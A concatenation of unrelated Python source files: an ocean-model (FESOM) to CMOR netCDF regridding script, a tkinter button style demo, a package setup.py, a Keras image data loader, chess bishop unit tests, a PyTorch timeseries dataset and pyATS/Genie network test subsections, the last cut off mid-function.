left_lon = config.getfloat('main', 'left_lon')
right_lon = config.getfloat('main', 'right_lon')
number_of_lons = config.getint('main', 'number_of_lons')
lower_lat = config.getfloat('main', 'lower_lat')
upper_lat = config.getfloat('main', 'upper_lat')
number_of_lats = config.getint('main', 'number_of_lats')
meshpath = config.get('main', 'meshpath')
path_to_data = config.get('main', 'path_to_data')
path_to_output = config.get('main', 'path_to_output')
zlib = config.getboolean('main', 'zlib')
radius_of_influence = config.getint('main', 'radius_of_influence')
k = config.getint('main', 'neighboring_points')
out_vars = config.get('main', 'out_vars').split(',')
out_vars = [w.strip() for w in out_vars]
print('='*50)
print("Variables that will be converted: {}".format(out_vars))
levels = np.asarray(config.get('main', 'levels').split(','), dtype='float')
angles_for_mesh = list(map(int,config.get('main','angles_for_mesh').split(',')))
angles_for_rotation = list(map(int,config.get('main','angles_for_rotation').split(',')))
start_year = config.getint('main','start_year')
end_year = config.getint('main','end_year')
ifile_template = config.get('main','ifile_template')
ifile_template_ice = config.get('main','ifile_template_ice')
ofile_template = config.get('main','ofile_template')
distribute_timesteps = config.getboolean('main', 'distribute_timesteps')
# Generate regular grid
lon = np.linspace(left_lon, right_lon, number_of_lons)
lat = np.linspace(lower_lat, upper_lat, number_of_lats)
lons, lats = np.meshgrid(lon,lat)
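# lons and lats are both 2D arrays of shape (number_of_lats, number_of_lons)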
# read the FESOM mesh
print('='*50)
mesh = pf.load_mesh(meshpath,abg=angles_for_mesh, get3d=True, usepickle=True)
# Open CMOR variable descriptions
with open('CMIP6_Omon.json') as data_file:
cmore_table = json.load(data_file, object_pairs_hook=OrderedDict)
with open('CMIP6_SIday.json') as data_file:
cmore_table_ice = json.load(data_file, object_pairs_hook=OrderedDict)
# Add some variables that are missing in CMOR tables
cmore_table['variable_entry']['wo']= OrderedDict([(u'modeling_realm', u'ocean'),
(u'standard_name', u'sea_water_z_velocity'),
(u'units', u'm s-1'),
(u'cell_methods', u'time: mean'),
(u'cell_measures', u'--OPT'),
(u'long_name', u'Sea Water Z Velocity'),
(u'comment',
u'Not a standard CMOR variable'),
(u'dimensions', u'longitude latitude olevel time'),
(u'out_name', u'wo'),
(u'type', u'real'),
(u'positive', u''),
(u'valid_min', u''),
(u'valid_max', u''),
(u'ok_min_mean_abs', u''),
(u'ok_max_mean_abs', u'')])
cmore_table['variable_entry']['wpot']= OrderedDict([(u'modeling_realm', u'ocean'),
(u'standard_name', u'sea_water_z_velocity'),
(u'units', u'm s-1'),
(u'cell_methods', u'time: mean'),
(u'cell_measures', u'--OPT'),
(u'long_name', u'Vertical Velocity Potential'),
(u'comment',
u'Not a standard CMOR variable'),
(u'dimensions', u'longitude latitude olevel time'),
(u'out_name', u'wpot'),
(u'type', u'real'),
(u'positive', u''),
(u'valid_min', u''),
(u'valid_max', u''),
(u'ok_min_mean_abs', u''),
(u'ok_max_mean_abs', u'')])
cmore_table_ice['variable_entry']['esithick'] = OrderedDict([(u'modeling_realm', u'seaIce'),
(u'standard_name', u'effective_sea_ice_thickness'),
(u'units', u'm'),
(u'cell_methods', u'area: mean where sea_ice time: mean'),
(u'cell_measures', u'area: areacella'),
(u'long_name', u'Effective Sea-ice thickness'),
(u'comment',
u'Effective thickness of sea ice (volume divided by grid area as was done in CMIP5)'),
(u'dimensions', u'longitude latitude time'),
(u'out_name', u'esithick'),
(u'type', u''),
(u'positive', u''),
(u'valid_min', u''),
(u'valid_max', u''),
(u'ok_min_mean_abs', u''),
(u'ok_max_mean_abs', u'')])
# Combine ocean and sea ice variables
cmore_table['variable_entry'].update(cmore_table_ice['variable_entry'])
# Map FESOM variables to CMOR variables and provide some
# additional information for conversion
vardir = {}
vardir['temp'] = {}
vardir['temp']['dims'] = '3D'
vardir['temp']['cname'] = 'thetao'
vardir['salt'] = {}
vardir['salt']['dims'] = '3D'
vardir['salt']['cname'] = 'so'
vardir['u'] = {}
vardir['u']['dims'] = '3D'
vardir['u']['cname'] = 'uo'
vardir['u']['rotate_with'] = 'v'
vardir['v'] = {}
vardir['v']['dims'] = '3D'
vardir['v']['cname'] = 'vo'
vardir['v']['rotate_with'] = 'u'
vardir['w'] = {}
vardir['w']['dims'] = '3D'
vardir['w']['cname'] = 'wo'
vardir['wpot'] = {}
vardir['wpot']['dims'] = '3D'
vardir['wpot']['cname'] = 'wpot'
vardir['ssh'] = {}
vardir['ssh']['dims'] = '2D'
vardir['ssh']['cname'] = 'zos'
vardir['ssh']['realm'] = 'ocean'
vardir['area'] = {}
vardir['area']['dims'] = '2D'
vardir['area']['cname'] = 'siconc'
vardir['area']['realm'] = 'seaice'
vardir['hice'] = {}
vardir['hice']['dims'] = '2D'
vardir['hice']['cname'] = 'esithick'
vardir['hice']['realm'] = 'seaice'
vardir['uice'] = {}
vardir['uice']['dims'] = '2D'
vardir['uice']['cname'] = 'siu'
vardir['uice']['realm'] = 'seaice'
vardir['uice']['rotate_with'] = 'vice'
vardir['vice'] = {}
vardir['vice']['dims'] = '2D'
vardir['vice']['cname'] = 'siv'
vardir['vice']['realm'] = 'seaice'
vardir['vice']['rotate_with'] = 'uice'
def noempty_dict(d):
'''
Removes keys with empty string values from dictionary.
Parameters
----------
d : OrderedDict
input dictionary
Returns
-------
d_out : OrderedDict
output dict with empty strings removed
'''
d_out = OrderedDict()
for key, value in d.items():  # items() works on both Python 2 and 3
if value != u'':
d_out[key]=value
return d_out
def progressbar(progress_total, progress_passed, year, variable, \
timestep, level, time):
formatted_time = num2date(time[timestep], time.units).strftime('%Y-%m-%d')
sys.stdout.write('{}\n'.format('Variable: '+variable+\
', Timestep: '+formatted_time+\
', Level: '+str(level)))
tdif = progress_total
tpassed = progress_passed
ratio = tpassed/float(tdif)
filled = '=' * int( ratio * 50)
rest = '-' * ( 50 - int( ratio * 50) )
sys.stdout.write('|' + filled+'>'+rest+ '| {:.2f}%'.format(ratio*100))
sys.stdout.write('\r\033[1A')
sys.stdout.flush()
# Calculate distances and indices that will be used for interpolation
distances, inds = pf.create_indexes_and_distances(mesh, lons, lats,\
k=k, n_jobs=8)
# The main loop
def convertit(year):
ifile = os.path.join(path_to_data, ifile_template.format(str(year)))
ofile = os.path.join(path_to_output, ofile_template.format(str(year)))
print('Open {}'.format(ifile))
fl = Dataset(ifile)
fw = Dataset(ofile, mode='w', format='NETCDF4_CLASSIC')
var2d = 0
var3d = 0
for varname in out_vars:
if vardir[varname]['dims'] == '2D':
var2d += 1
elif vardir[varname]['dims'] == '3D':
var3d += 1
var3d = var3d*len(levels)*fl.variables['time'].shape[0]
var2d = var2d*fl.variables['time'].shape[0]
progress_total = var3d+var2d
progress_passed = 0
# create dimensions
fw.createDimension('latitude', lats.shape[0])
fw.createDimension('longitude', lons.shape[1])
fw.createDimension('time', None)
fw.createDimension('depth_coord', levels.shape[0] )
lat = fw.createVariable('latitude', 'd', ('latitude'))
lat.setncatts(noempty_dict(cmore_table['axis_entry']['latitude']))
lat[:] = lats[:,0].flatten()
lon = fw.createVariable('longitude', 'd', ('longitude'))
lon.setncatts(noempty_dict(cmore_table['axis_entry']['longitude']))
lon[:] = lons[0,:].flatten()
depth = fw.createVariable('depth_coord','d',('depth_coord'))
depth.setncatts(noempty_dict(cmore_table['axis_entry']['depth_coord']))
depth[:] = levels
time = fw.createVariable('time','d',('time'))
time.setncatts(cmore_table['axis_entry']['time'])
if distribute_timesteps:
nsteps = fl.variables['time'].shape[0]
td = datetime.timedelta(days = 365/nsteps)
sdate = datetime.datetime(year,1,1,0,0,0)
seconds = []
for i in range(1,nsteps+1):
workdate = sdate + td*i
seconds.append( (workdate-sdate).total_seconds() )
time.units = 'seconds since {}-01-01 00:00:00'.format(str(year))
time[:] = seconds
elif fl.variables['time'].units.strip().startswith('seconds since'):
time.units = fl.variables['time'].units
time[:] = fl.variables['time'][:]
elif fl.variables['time'].shape[0] == 12:
sdate = datetime.datetime(year,1,1,0,0,0)
td = datetime.timedelta(days = 14.5)
seconds = []
for i in range(1,13):
workdate = datetime.datetime(year,i,1,0,0,0)+td
seconds.append( (workdate-sdate).total_seconds() )
time.units = 'seconds since {}-01-01 00:00:00'.format(str(year))
time[:] = seconds
else:
time.units = 'seconds since {}-01-01 00:00:00'.format(str(year))
time[:] = fl.variables['time'][:]
# Store processed variables (to not repeat
# processing for vector variables)
completed = []
# variables loop
for varname in out_vars:
# check if we have to convert two variables at once
# for vector variables.
do_two_vars = 'rotate_with' in vardir[varname]
#print("Converting {}.".format(varname))
# skip if the variable was already converted
if varname in completed:
pass
# 3D variables processing
elif vardir[varname]['dims']=='3D':
# Create netCDF variable
temp = fw.createVariable(vardir[varname]['cname'],'d',\
('time','depth_coord','latitude','longitude'), \
fill_value=-99999, zlib=zlib, complevel=1)
# add CMOR-compliant attributes
temp.setncatts(noempty_dict(cmore_table['variable_entry'][vardir[varname]['cname']]))
# If we have to convert two variables at once, create a netCDF variable for
# the second variable
if do_two_vars is True:
varname2 = vardir[varname]['rotate_with']
temp2 = fw.createVariable(vardir[varname2]['cname'],'d',('time','depth_coord','latitude','longitude'), fill_value=-99999, zlib=zlib, complevel=1)
temp2.setncatts(noempty_dict(cmore_table['variable_entry'][vardir[varname2]['cname']]))
# Loop over timesteps for 3D variables
for i in range(fl.variables[varname].shape[0]):
#for i in range(2):
# Get the whole 3D field into memory. It turns out that this is more
# efficient than selecting individual levels from the file on disk.
all_layers = fl.variables[varname][i,:]
# Get the data for the second variable if needed
if do_two_vars is True:
#print("Also converting {}, triggered by {}.".format(varname2, varname))
all_layers2 = fl.variables[varname2][i,:]
# Loop over vertical levels
for dlev, llev in enumerate(levels):
# get indices of the gridpoints that correspond to the level
ind_depth, ind_noempty, ind_empty = pf.ind_for_depth(llev, mesh)
# get the data for the level
level_data=np.zeros(shape=(mesh.n2d))
level_data[ind_noempty]=all_layers[ind_depth[ind_noempty]]
level_data[ind_empty] = np.nan
# Special treatment of the vector variables that need rotation
if do_two_vars is True:
# get the data for the level of the second variable
level_data2=np.zeros(shape=(mesh.n2d))
level_data2[ind_noempty]=all_layers2[ind_depth[ind_noempty]]
level_data2[ind_empty] = np.nan
#print('Rotate {} and {}'.format(varname, varname2))
# Rotate vector variables to geographical grid
uunr,vunr = pf.vec_rotate_r2g(angles_for_rotation[0],angles_for_rotation[1], \
angles_for_rotation[2], mesh.x2, mesh.y2,\
level_data, level_data2, 1)
# Interpolate rotated variables
#print('interpolation, layer {}'.format(str(llev)))
air_nearest = pf.fesom2regular(uunr, mesh, lons, lats, distances=distances,\
inds=inds, radius_of_influence=radius_of_influence, n_jobs=1)
air_nearest2 = pf.fesom2regular(vunr, mesh, lons, lats, distances=distances,\
inds=inds, radius_of_influence=radius_of_influence, n_jobs=1)
# Put values to the netCDF variables
temp[i,dlev,:,:] = air_nearest[:,:].filled(-99999)
temp2[i,dlev,:,:] = air_nearest2[:,:].filled(-99999)
else:
# Interpolate scalar variable
#print('interpolation, layer {}'.format(str(llev)))
air_nearest = pf.fesom2regular(level_data, mesh, lons, lats, distances=distances,\
inds=inds, radius_of_influence=radius_of_influence, n_jobs=1)
# Put values to the netCDF variable
temp[i,dlev,:,:] = air_nearest[:,:].filled(-99999)
progress_passed += 1
if do_two_vars is True:
progress_passed += 1
progressbar(progress_total, progress_passed, year,\
varname, i, llev, time)
# END Loop over timesteps for 3D variables
# add variable to the list of processed variables
completed.append(varname)
if do_two_vars is True:
completed.append(varname2)
# End 3D variables processing
# 2D variables processing
elif vardir[varname]['dims']=='2D':
# Create netCDF variable
temp = fw.createVariable(vardir[varname]['cname'],'d',\
('time','latitude','longitude'), \
fill_value=-99999, zlib=zlib, complevel=1)
# add CMOR-compliant attributes
temp.setncatts(noempty_dict(cmore_table['variable_entry'][vardir[varname]['cname']]))
# If we have to convert two variables at once, create a netCDF variable for
# the second variable
if do_two_vars is True:
varname2 = vardir[varname]['rotate_with']
temp2 = fw.createVariable(vardir[varname2]['cname'],'d',\
('time','latitude','longitude'), \
fill_value=-99999, zlib=zlib, complevel=1)
temp2.setncatts(noempty_dict(cmore_table['variable_entry'][vardir[varname2]['cname']]))
# For sea ice variables we have to open a different file, so
# open either the ocean or the sea ice input file.
if vardir[varname]['realm']=='ocean':
temp.setncatts(noempty_dict(cmore_table['variable_entry'][vardir[varname]['cname']]))
ncfile_handler = fl
elif vardir[varname]['realm']=='seaice':
temp.setncatts(noempty_dict(cmore_table['variable_entry'][vardir[varname]['cname']]))
ifile_ice = os.path.join(path_to_data, ifile_template_ice.format(str(year)))
ncfile_handler = Dataset(ifile_ice)
# Loop over timesteps for 2D variables
for i in range(ncfile_handler.variables[varname].shape[0]):
#for i in range(2):
# Get the whole 2D field into memory. It turns out that this is more
# efficient than selecting individual records from the file on disk.
all_layers = ncfile_handler.variables[varname][i,:]
# Get the data for the second variable if needed
if do_two_vars is True:
print("Also converting {}, triggered by {}.".format(varname2, varname))
all_layers2 = ncfile_handler.variables[varname2][i,:]
# get indices of the gridpoints that correspond to the surface level
ind_depth, ind_noempty, ind_empty = pf.ind_for_depth(0, mesh)
# get the data for the surface level
level_data=np.zeros(shape=(mesh.n2d))
level_data[ind_noempty]=all_layers[ind_depth[ind_noempty]]
level_data[ind_empty] = np.nan
# Special treatment of the vector variables that need rotation
if do_two_vars is True:
# get the data for the surface level of the second variable
level_data2=np.zeros(shape=(mesh.n2d))
level_data2[ind_noempty]=all_layers2[ind_depth[ind_noempty]]
level_data2[ind_empty] = np.nan
# Rotate vector variables to geographical grid
print('Rotate {} and {}'.format(varname, varname2))
uunr,vunr = pf.vec_rotate_r2g(angles_for_rotation[0],angles_for_rotation[1], \
angles_for_rotation[2], mesh.x2, mesh.y2,\
level_data, level_data2, 1)
# Interpolate rotated variables
air_nearest = pf.fesom2regular(uunr, mesh, lons, lats, distances=distances,\
inds=inds, radius_of_influence=radius_of_influence, n_jobs=1)
air_nearest2 = pf.fesom2regular(vunr, mesh, lons, lats, distances=distances,\
inds=inds, radius_of_influence=radius_of_influence, n_jobs=1)
# fill in netCDF variables
temp[i,:,:] = air_nearest[:,:].filled(-99999)
temp2[i,:,:] = air_nearest2[:,:].filled(-99999)
else:
# Interpolate scalar variable and fill in netCDF variable.
air_nearest = pf.fesom2regular(level_data, mesh, lons, lats, distances=distances,\
inds=inds, radius_of_influence=radius_of_influence, n_jobs=1)
temp[i,:,:] = air_nearest[:,:].filled(-99999)
progress_passed += 1
if do_two_vars is True:
progress_passed += 1
progressbar(progress_total, progress_passed, year,\
varname, i, 0, time)
# END Loop over timesteps for 2D variables
completed.append(varname)
if do_two_vars is True:
completed.append(varname2)
# end variables loop
fw.close()
print('{} is ready'.format(ofile))
# end of the main loop
print('='*50)
years = range(start_year, end_year+1)
pool = mp.Pool(processes=1)
r = pool.map(convertit, years)
pool.close()
#for year in range(start_year, end_year+1):
# convertit(year)
|
import tkinter as tk
import tkinter.ttk as ttk
root = tk.Tk()
s = ttk.Style()
#s.configure('TButton', background='green')
bg = s.lookup('TButton', 'background')
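# Mapping the 'active' state back to the theme's default background disables
# the hover highlight that ttk normally applies to buttons.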
s.map('TButton',
# background=[('active', 'red')]
background=[('active', bg)]
)
btn1 = ttk.Button(root, text='Sample', style='TButton')
btn1.pack()
btn2 = ttk.Button(root, text='Sample')
btn2.pack()
root.mainloop()
|
from setuptools import setup
from os import path
this_directory = path.abspath(path.dirname(__file__))
with open(path.join(this_directory, 'README.md'), encoding = 'utf-8') as f:
long_description = f.read()
setup(
name = 'ror',
packages = ['ror'],
version = '0.0.1',
python_requires = '>=3.6',
license = 'MIT',
description = 'ROR method solver',
long_description = long_description,
long_description_content_type = 'text/markdown',
author = 'Jakub Tomczak',
url = 'https://github.com/jtomczak/ror',
install_requires = [
'gurobipy',
'pandas',
'numpy',
'graphviz',
'pylatex'
],
dependency_links = ['https://pypi.gurobi.com'],
classifiers = [
'Development Status :: 3 - Alpha',
'Programming Language :: Python :: 3',
'Intended Audience :: Developers',
'Topic :: Scientific/Engineering',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent'
],
)
|
import os
import cv2
import random
import pickle
import numpy as np
from helper import constant
from imutils import paths
from matplotlib import pyplot as plt
from sklearn.preprocessing import LabelBinarizer
from sklearn.model_selection import train_test_split
from keras.preprocessing.image import ImageDataGenerator, img_to_array
class DataHandler:
def load_dataset(self, args):
"""
:param args: list of arguments (list)
:return x_train, x_test, y_train, y_test: train/test sets (numpy arrays)
"""
print("[INFO] loading images...")
data, labels = self.load_data_and_labels(args)
print("[INFO] data matrix: {:.2f}MB".format(data.nbytes / (1024 * 1000.0)))
lb = LabelBinarizer()
labels = lb.fit_transform(labels)
print("[INFO] serializing label binarizer...")
self.dump_labels(args, lb)
print("[INFO] splitting train/test sets...")
(x_train, x_test, y_train, y_test) = train_test_split(data, labels, test_size=0.2, random_state=42)
self.show_examples(args, x_train)
return x_train, x_test, y_train, y_test
def load_data_and_labels(self, args):
"""
:param args: list of arguments (list)
:return data, labels: loaded data and labels (numpy arrays)
"""
data = []
labels = []
image_paths = sorted(list(paths.list_images(args["dataset"])))
random.seed(42)
random.shuffle(image_paths)
for imagePath in image_paths:
# load the image, pre-process it, and store it in the data list
image = cv2.imread(imagePath)
image = cv2.resize(image, (constant.IMAGE_WIDTH, constant.IMAGE_HEIGHT))  # cv2.resize expects (width, height)
image = img_to_array(image)
data.append(image)
# extract the class label from the image path and update the
# labels list
label = imagePath.split(os.path.sep)[-2]
labels.append(label)
data = np.array(data, dtype="float") / 255.0
labels = np.array(labels)
return data, labels
def load_labels(self, args):
"""
:param args: list of arguments (list)
:return lb: label binarizer
"""
with open(args["labelbin"], "rb") as f:
lb = pickle.loads(f.read())
return lb
def dump_labels(self, args, lb):
"""
:param args: list of arguments (list)
:param lb: label binarizer
:return:
"""
f = open(args["labelbin"], "wb")
f.write(pickle.dumps(lb))
f.close()
def load_example(self, image_path):
"""
:param image_path: path of the image (str)
:return example, image: example to classify, image copy to display
"""
example = cv2.imread(image_path)
image = example.copy()
# pre-process the image for classification
example = cv2.resize(example, (constant.IMAGE_WIDTH, constant.IMAGE_HEIGHT))  # cv2.resize expects (width, height)
example = example.astype("float") / 255.0
example = img_to_array(example)
example = np.expand_dims(example, axis=0)
return example, image
def data_augmentation(self):
"""
:return: ImageDataGenerator class
"""
return ImageDataGenerator(
rotation_range=25,
width_shift_range=0.1,
height_shift_range=0.1,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True,
fill_mode="nearest"
)
def show_examples(self, args, x_train):
"""
:param args: list of arguments (list)
:param x_train: training set (numpy array)
:return:
"""
if args["show_examples"]:
print("[INFO] showing a batch of training examples...")
for i in range(9):
plt.subplot(330 + 1 + i)
plt.imshow(x_train[i])
plt.show()
def display_dataset_shape(self, args):
"""
:param args: list of arguments (list)
:return:
"""
x_train, x_test, y_train, y_test = self.load_dataset(args)
print("[INFO] number of training examples = " + str(x_train.shape[0]))
print("[INFO] number of test examples = " + str(x_test.shape[0]))
print("[INFO] X_train shape: " + str(x_train.shape))
print("[INFO] Y_train shape: " + str(y_train.shape))
print("[INFO] X_test shape: " + str(x_test.shape))
print("[INFO] Y_test shape: " + str(y_test.shape))
|
import unittest
from pieces.bishop import Bishop
from board import Board
class TestBishop(unittest.TestCase):
def test_no_movement(self):
board = Board()
bishop1 = Bishop("W", 7, 0, board)
bishop2 = Bishop("W", 6, 1, board)
board.add_piece(bishop1, 7, 0)
board.add_piece(bishop2, 6, 1)
self.assertEqual(bishop1.generate_legal_moves(), [], "Should be empty array")
def test_capture(self):
board = Board()
bishop1 = Bishop("W", 7, 0, board)
bishop2 = Bishop("B", 6, 1, board)
board.add_piece(bishop1, 7, 0)
board.add_piece(bishop2, 6, 1)
self.assertEqual(bishop1.generate_legal_moves(), [(6, 1)], "Should be [(6, 1)]")
def test_capture_and_move(self):
board = Board()
bishop1 = Bishop("W", 6, 1, board)
bishop2 = Bishop("B", 7, 0, board)
bishop3 = Bishop("W", 5, 2, board)
bishop4 = Bishop("W", 5, 0, board)
bishop5 = Bishop("W", 7, 2, board)
board.add_piece(bishop1, 6, 1)
board.add_piece(bishop2, 7, 0)
board.add_piece(bishop3, 5, 2)
board.add_piece(bishop4, 5, 0)
board.add_piece(bishop5, 7, 2)
self.assertEqual(bishop1.generate_legal_moves(), [(7, 0)], "Should be [(7, 0)]")
def test_full_diagonal(self):
board = Board()
bishop1 = Bishop("W", 7, 7, board)
board.add_piece(bishop1, 7, 7)
self.assertEqual(bishop1.generate_legal_moves(),
[(6, 6), (5, 5), (4, 4), (3, 3), (2, 2), (1, 1), (0, 0)],
"Should be [(6, 6), (5, 5), (4, 4), (3, 3), (2, 2), (1, 1), (0, 0)]")
if __name__ == '__main__':
unittest.main()
|
"""Returns a timeseries with input and target.
"""
import torch
import torch.utils.data as data
import numpy as np
class Timeseries(data.Dataset):
"""Provide a dataset with samples x timesteps x (remaining variables).
"""
def __init__(self, data, timesteps=[0], device=None):
self.data = data
self.timesteps = timesteps
time_range = max(max(timesteps), 0) - min(min(timesteps), 0)
self.min_time = min(min(timesteps), 0)
self.items_per_sample = self.data.shape[1]-(time_range+1)
self.device = device
def __len__(self):
return self.data.shape[0]*self.items_per_sample
def to(self, device=None):
self.device = device
return self
def __getitem__(self, idx):
idx_0 = int(np.floor(idx/self.items_per_sample))
idx_1 = int(idx % self.items_per_sample)
input = self.data[idx_0, [idx_1-self.min_time]]
target_range = [idx_1+t-self.min_time for t in self.timesteps]
target = self.data[idx_0, target_range]
input = torch.from_numpy(input.astype(np.float32))  # .to(device=self.device)
target = torch.from_numpy(target.astype(np.float32))  # .to(device=self.device)
return {'input': input, 'target': target}
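# Example (synthetic data, shaped samples x timesteps x variables):
# ds = Timeseries(np.random.randn(4, 100, 3), timesteps=[1, 2])
# batch = ds[0]  # batch['input']: (1, 3) tensor, batch['target']: (2, 3) tensor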
|
# python
import logging
from copy import deepcopy
from operator import attrgetter
from json import dumps
# Genie Libs
from genie.libs import sdk
# ats
from pyats import aetest
from pyats.log.utils import banner
from pyats.datastructures import AttrDict
# abstract
from genie.abstract import Lookup
# import pcall
import importlib
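# 'async' became a reserved keyword in Python 3.7, so newer pyATS releases
# ship the module as pyats.async_; fall back to it if the old name fails.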
try:
pcall = importlib.import_module('pyats.async').pcall
except ImportError:
from pyats.async_ import pcall
# unicon
from unicon.eal.dialogs import Statement, Dialog
# Genie
from genie.utils.timeout import Timeout
from genie.utils.summary import Summary
from genie.conf.base import Base as ConfBase
from genie.ops.base import Base as OpsBase
# genie.libs
from genie.libs import ops
from genie.libs import conf
from genie.libs.sdk.libs.abstracted_libs.processors import load_config_precessor
from genie.libs.sdk.libs.utils.normalize import _to_dict
from genie.libs.sdk.libs.utils.normalize import merge_dict
log = logging.getLogger(__name__)
EXCLUDED_DEVICE_TYPES = ['tgn']
@aetest.subsection
def save_bootvar(self, testbed):
"""Check boot information and save bootvar to startup-config
Args:
testbed (`obj`): Testbed object
Returns:
None
Raises:
pyATS Results
"""
# Create Summary
summary = Summary(title='Summary', width=90)
devices = []
for dev in self.parent.mapping_data['devices']:
device = testbed.devices[dev]
if device.type in EXCLUDED_DEVICE_TYPES:
msg = " - This subsection is not supported for 'TGN' devices"
summarize(summary, message=msg, device=dev)
continue
devices.append(device)
device_dict = {}
failed = False
# We don't catch exceptions since failures will lead to passx in that
# CommonSetup subsection
asynchronous_boot_var_output = pcall(
asynchronous_save_boot_variable,
ckwargs={
'self': self,
'device_dict': device_dict},
device=tuple(devices))
for item in asynchronous_boot_var_output:
for dev, res in item.items():
if res == 'Failed':
failed = True
msg = " - Failed to save boot variable or copy "\
"running-config to startup-config"
summarize(summary, message=msg, device=dev)
elif res == 'Skipped':
msg = " - Skipped saving boot variable or copy "\
"running-config to startup-config"
summarize(summary, message=msg, device=dev)
else:
msg = " - Successfully saved boot variable"
summarize(summary, message=msg, device=dev)
summary.print()
if failed:
self.passx("Issue while saving boot variable on one of the devices, "
"Check section summary for more details")
@aetest.subsection
def learn_the_system(self, testbed, steps, features=None):
"""Learn and store the system properties
Args:
testbed (`obj`): Testbed object
steps (`obj`): aetest steps object
features (`dict`): dict of components and the feature that contains the component.
ex. {'pim': ['autorp',],
'bgp': ['confederationpeers', 'gracefulrestart']}
Returns:
None
Raises:
pyATS Results
"""
    log.info(
        banner(
            'Learn and store platform information and lldp neighbors, '
            'from PTS if it exists, otherwise from show commands'))
# get uut, having a uut is mandatory in Genie
uut = testbed.devices['uut']
lookup = Lookup.from_device(uut)
# get platform PTS
platform_pts = self.parameters.get(
'pts',
{}).get(
'platform',
{}).get(
'uut',
None)
with steps.start("Store and learn platform information from 'show lldp neighbors detail' on {}"
.format(self.name)) as step:
try:
            lookup.sdk.libs.abstracted_libs.subsection.learn_system(
                device=uut, steps=steps, platform_pts=platform_pts)
except Exception as e:
step.passx('Cannot Learn and Store system info',
from_exception=e)
# learn platform lldp neighbors
with steps.start("learn platform lldp neighbors on device {}"
.format(uut.name)) as step:
        # initial lldp ops object
lldp_ops = lookup.ops.lldp.lldp.Lldp(
uut, attributes=['info[interfaces][(.*)][neighbors][(.*)][port_id]'])
# learn the lldp ops
try:
lldp_ops.learn()
except Exception as e:
step.passx('Cannot learn lldp information',
from_exception=e)
if not hasattr(lldp_ops, 'info'):
step.passx('No LLDP neighbors')
# store the lldp information
uut.lldp_mapping = lldp_ops.info['interfaces']
@aetest.subsection
def learn_the_system_from_conf_ops(self, testbed, steps, features=None):
"""Learn and store the system properties
Args:
testbed (`obj`): Testbed object
steps (`obj`): aetest steps object
features (`dict`): dict of feature and attributes which want to learn.
ex. {'conf.pim.Pim': [
'pim[vrf_attr][(.*)][address_family_attr][ipv4][send_rp_announce_intf]',
'pim[vrf_attr][(.*)][address_family_attr][ipv4][send_rp_announce_group_list]'],
'conf.bgp.Bgp': ['bgp[instance][(.*)][vrf_attr][(.*)][confederation_peers_as]']}
Returns:
None
Raises:
pyATS Results
"""
def remove_parent_from_conf_dict(conf_dict):
temp_dict = deepcopy(conf_dict)
for key, val in temp_dict.items():
if key == 'parent':
conf_dict.pop('parent')
if isinstance(val, dict):
remove_parent_from_conf_dict(conf_dict[key])
def store_structure(device, feature):
# get feature and attributes
[(ft, attr)] = feature.items()
        log.info(banner("Learning '{n}' feature with "
                        "attributes {a} on device {d}"
                        .format(n=ft, a=attr, d=device)))
# perform lookup per device
lib = Lookup.from_device(device)
# attach ops and conf
lib.conf = getattr(lib, 'conf', conf)
lib.ops = getattr(lib, 'ops', ops)
# create the ops/conf instance
try:
obj = attrgetter(ft)(lib)
except Exception:
raise AttributeError('Cannot load %s for '
'device %s.' % (ft, device.name))
# conf learn_config
if issubclass(obj, ConfBase):
ret = obj.learn_config(device=device, attributes=attr)
ret = _to_dict(ret[0])
            # delete the unused objects so the result can be returned through pcall
ret.pop('__testbed__')
ret.pop('devices')
ret.pop('interfaces')
remove_parent_from_conf_dict(ret['device_attr'][device.name])
elif issubclass(obj, OpsBase):
ret = obj(device, attributes=attr)
ret.learn()
temp = AttrDict()
temp.info = getattr(ret, 'info', {})
ret = temp
ret_dict = {}
ret_dict.setdefault('lts', {}).\
setdefault(ft, {}).setdefault(device.name, ret)
# return the dictionary
return ret_dict
devices = []
for name in testbed.devices:
dev = testbed.devices[name]
if not dev.is_connected():
continue
devices.append(dev)
# create the abstract object list
merged_dict = {}
for ft in features:
worker_devs = []
worker_features = []
for device in devices:
worker_devs.append(device)
worker_features.append({ft: features[ft]})
# pcall for each feature
ret = pcall(
store_structure,
device=worker_devs,
feature=worker_features)
        for i in ret:
            merge_dict(merged_dict, i)
self.parent.parameters.update(merged_dict)
# print out what we learned in LTS
log.info('LTS information is \n{d}'.format(d=dumps(merged_dict, indent=5)))
@aetest.subsection
def load_config_as_string(self, testbed, steps, configs, connect=False):
if connect:
for name in self.parent.mapping_data['devices']:
dev = testbed.devices[name]
# connect with console
try:
dev.connect(via='a')
except Exception as e:
self.failed(
'Cannot connect the console on {}'.format(
dev.name), from_exception=e)
try:
load_config_precessor(self, configs)
except Exception as e:
self.passx('Cannot Load configuration',
from_exception=e)
# disconnect the router from console
if connect:
for name in self.parent.mapping_data['devices']:
dev = testbed.devices[name]
            # disconnect from the console
try:
dev.disconnect()
dev.destroy()
except Exception as e:
self.passx(
'Cannot disconnect the console on {}'.format(
dev.name), from_exception=e)
@aetest.subsection
def configure_replace(self, testbed, steps, devices, include_os=None,
exclude_os=None, include_devices=None, exclude_devices=None,
timeout=60):
if exclude_devices:
log.info("Excluded devices by exclude_devices: {exclude_devices}".format(
exclude_devices=exclude_devices))
if include_devices:
log.info("Included devices by include_devices: {include_devices}".format(
include_devices=include_devices))
if include_os:
log.info("Included OS by include_os: {include_os}"
.format(include_os=include_os))
if exclude_os:
log.info("Excluded OS by exclude_os: {exclude_os}"
.format(exclude_os=exclude_os))
    # Utility function
def _configure_replace_util(device, dev, device_name):
try:
file_name = None
file_location = None
lookup = Lookup.from_device(device)
if 'file_location' in dev:
file_location = dev['file_location']
else:
file_location = lookup.sdk.libs. \
abstracted_libs.subsection.get_default_dir(
device=device)
            if 'file_name' not in dev:
                log.error('Missing file_name for device {}'.format(device_name))
                return
            file_name = dev['file_name']
lookup.sdk.libs.abstracted_libs.subsection.configure_replace(
device, file_location, timeout=dev.get(
'timeout', timeout), file_name=file_name)
except Exception as e:
self.failed("Failed to replace config : {}".format(str(e)))
log.info("Configure replace is done for device {}".format(device_name))
    if exclude_devices is not None and include_devices is not None:
if set(exclude_devices).intersection(include_devices):
raise ValueError("Same device is specified in both include and exclude devices filter. "
"Use only one filter. Both are not allowed")
    if exclude_os is not None and include_os is not None:
if set(exclude_os).intersection(include_os):
raise ValueError("Same os is specified in both include and exclude os filter. "
"Use only one filter. Both are not allowed")
for name, dev in devices.items():
if name == 'all':
